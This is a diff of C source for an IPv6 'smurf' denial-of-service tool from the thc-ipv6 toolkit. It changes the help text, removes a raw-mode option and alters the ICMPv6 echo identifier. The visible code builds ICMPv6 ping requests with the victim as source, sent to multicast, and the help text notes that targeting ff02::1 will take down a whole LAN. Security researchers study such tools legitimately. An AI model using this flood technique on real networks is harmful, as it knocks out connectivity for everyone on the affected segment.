@@ -10,15 +10,13 @@
 #include <pcap.h>
 #include "thc-ipv6.h"
 
-extern int debug;
-
 void help(char *prg) {
-  printf("%s %s (c) 2011 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
-  printf("Syntax: %s [-r] interface victim-ip\n\n", prg);
+  printf("%s %s (c) 2012 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
+  printf("Syntax: %s interface victim-ip\n\n", prg);
   printf("Smurfs the local network of the victim. Note: this depends on an\n");
   printf("implementation error, currently only verified on Linux.\n");
   printf("Evil: \"ff02::1\" as victim will DOS your local LAN completely\n");
-  printf("Use -r to use raw mode.\n\n");
+//  printf("Use -r to use raw mode.\n\n");
   exit(-1);
 }
 
@@ -46,7 +44,7 @@ int main(int argc, char *argv[]) {
   memset(buf, 'A', 16);
   if ((pkt = thc_create_ipv6(interface, PREFER_GLOBAL, &pkt_len, multicast6, victim6, 0, 0, 0, 0, 0)) == NULL)
     return -1;
-  if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xdeadbeef, (unsigned char *) &buf, 16, 0) < 0)
+  if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, 16, 0) < 0)
     return -1;
   if (thc_generate_pkt(interface, fakemac, NULL, pkt, &pkt_len) < 0) {
     fprintf(stderr, "Error: Can not generate packet, exiting ...\n");
